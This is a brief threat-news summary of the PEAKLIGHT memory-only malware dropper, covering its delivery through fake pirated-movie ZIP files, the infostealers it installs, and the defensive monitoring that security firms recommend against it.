Peaklight Malware Targets Users to Steal Credentials, Browser History, and Financial Data - #Peaklight
PEAKLIGHT, a sophisticated memory-only dropper and downloader, has emerged as a significant threat in the cybersecurity landscape. This malware, distributed through malicious ZIP files disguised as pirated movies, initiates a multi-stage infection process using Microsoft Shortcut Files (LNK) and PowerShell scripts. PEAKLIGHT's primary function is to deliver various infostealers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT, while employing advanced evasion techniques such as system binary proxy execution and CDN abuse. The malware's complex obfuscation methods and lack of disk footprint make it challenging to detect. Cybersecurity firms like Mandiant, Morphisec, and TRAC Labs have analyzed PEAKLIGHT's tactics and provided recommendations for protection, including monitoring for suspicious activities and implementing advanced security tools like Sysmon and Wazuh. As the threat landscape continues to evolve, the emergence of PEAKLIGHT underscores the importance of robust cybersecurity measures and ongoing vigilance.